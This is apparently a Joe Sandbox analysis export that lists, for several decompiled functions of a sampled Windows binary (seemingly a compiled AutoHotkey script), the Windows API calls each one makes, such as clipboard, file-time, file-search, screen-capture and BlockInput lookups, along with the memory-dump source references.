Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004253A1, Relevance: 9.3, APIs: 6, Instructions: 263time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427C8E, Relevance: 9.2, APIs: 6, Instructions: 211time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 0042CF30: GetMenu.USER32(000601DA), ref: 0042CF71
Part of subcall function 0042CF30: CheckMenuItem.USER32(00000000,?,00000000), ref: 0042CF78

Part of subcall function 0042D080: GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
Part of subcall function 0042D080: GetProcAddress.KERNEL32(00000000), ref: 0042D0A1

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004269A5, Relevance: 9.2, APIs: 6, Instructions: 210time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427240, Relevance: 9.2, APIs: 6, Instructions: 200time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00441140: _strncpy.LIBCMT ref: 00441254
Part of subcall function 00441140: SystemTimeToFileTime.KERNEL32(?,?,?,004987E9), ref: 00441299
Part of subcall function 00441140: LocalFileTimeToFileTime.KERNEL32(?,?,?,004987E9), ref: 004412AD
Part of subcall function 00441140: GetLastError.KERNEL32(?,004987E9), ref: 004412B7
Part of subcall function 00441140: GetSystemTimeAsFileTime.KERNEL32(?), ref: 004412FC
Part of subcall function 00441140: FindFirstFileA.KERNEL32(?,?,?,?,?,?,004987E9), ref: 004413B8
Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,004987E9), ref: 004413D7
Part of subcall function 00441140: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004413FD
Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,004987E9), ref: 00441413
Part of subcall function 00441140: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,22000000,00000000), ref: 004414CB
Part of subcall function 00441140: GetLastError.KERNEL32 ref: 004414D8
Part of subcall function 00441140: SetFileTime.KERNEL32(00000000,00000000,?,00000000), ref: 0044152D
Part of subcall function 00441140: GetLastError.KERNEL32 ref: 00441537
Part of subcall function 00441140: CloseHandle.KERNEL32(00000000), ref: 00441544
Part of subcall function 00441140: FindNextFileA.KERNEL32(?,00000010), ref: 0044155D
Part of subcall function 00441140: FindClose.KERNEL32(?), ref: 0044156C
Part of subcall function 00441140: FindFirstFileA.KERNEL32(?,?), ref: 004415A6
Part of subcall function 00441140: GetTickCount.KERNEL32 ref: 004415D0
Part of subcall function 00441140: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004415FA
Part of subcall function 00441140: GetTickCount.KERNEL32(?,?,?,?,?,?,004987E9), ref: 00441610
Part of subcall function 00441140: FindNextFileA.KERNEL32(00000000,00000010), ref: 004416BA
Part of subcall function 00441140: FindClose.KERNEL32(00000000), ref: 004416C9

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427DD6, Relevance: 9.2, APIs: 6, Instructions: 198time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 0042D080: GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
Part of subcall function 0042D080: GetProcAddress.KERNEL32(00000000), ref: 0042D0A1

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427193, Relevance: 9.2, APIs: 6, Instructions: 197time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 004408E0: _strncpy.LIBCMT ref: 004409DE
Part of subcall function 004408E0: FindFirstFileA.KERNEL32(?,?), ref: 00440ABA
Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440AEA
Part of subcall function 004408E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440B10
Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440B26
Part of subcall function 004408E0: SetFileAttributesA.KERNEL32(?,00000010), ref: 00440D7C
Part of subcall function 004408E0: GetLastError.KERNEL32 ref: 00440D86
Part of subcall function 004408E0: FindNextFileA.KERNEL32(?,00000010), ref: 00440DA3
Part of subcall function 004408E0: FindClose.KERNEL32(?), ref: 00440DB2
Part of subcall function 004408E0: FindFirstFileA.KERNEL32(?,?), ref: 00440DE5
Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440E10
Part of subcall function 004408E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440E3A
Part of subcall function 004408E0: GetTickCount.KERNEL32 ref: 00440E50
Part of subcall function 004408E0: FindNextFileA.KERNEL32(?,00000010), ref: 00440EDC
Part of subcall function 004408E0: FindClose.KERNEL32(?), ref: 00440EEF
Part of subcall function 004408E0: __itow.LIBCMT ref: 00440F25

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425BD8, Relevance: 9.2, APIs: 6, Instructions: 196time

APIs

Part of subcall function 00437340: GetForegroundWindow.USER32 ref: 00437434
Part of subcall function 00437340: IsIconic.USER32(00000000), ref: 00437441
Part of subcall function 00437340: GetWindowRect.USER32(00000000,?), ref: 00437455
Part of subcall function 00437340: ClientToScreen.USER32(00000000,?), ref: 0043746D
Part of subcall function 00437340: GetDC.USER32(00000000), ref: 004374DA
Part of subcall function 00437340: CreateCompatibleDC.GDI32(?), ref: 0043751D
Part of subcall function 00437340: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00437536
Part of subcall function 00437340: SelectObject.GDI32(?,00000000), ref: 00437550
Part of subcall function 00437340: BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0043757F
Part of subcall function 00437340: ReleaseDC.USER32(00000000,?), ref: 00437776
Part of subcall function 00437340: SelectObject.GDI32(?,?), ref: 0043778E
Part of subcall function 00437340: DeleteDC.GDI32(?), ref: 00437795
Part of subcall function 00437340: DeleteObject.GDI32(?), ref: 004377A4
Part of subcall function 00437340: GetPixel.GDI32(?,?,?), ref: 00437983
Part of subcall function 00437340: ReleaseDC.USER32(00000000,?), ref: 0043799F

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426929, Relevance: 9.2, APIs: 6, Instructions: 193time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004273E1, Relevance: 9.2, APIs: 6, Instructions: 189time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
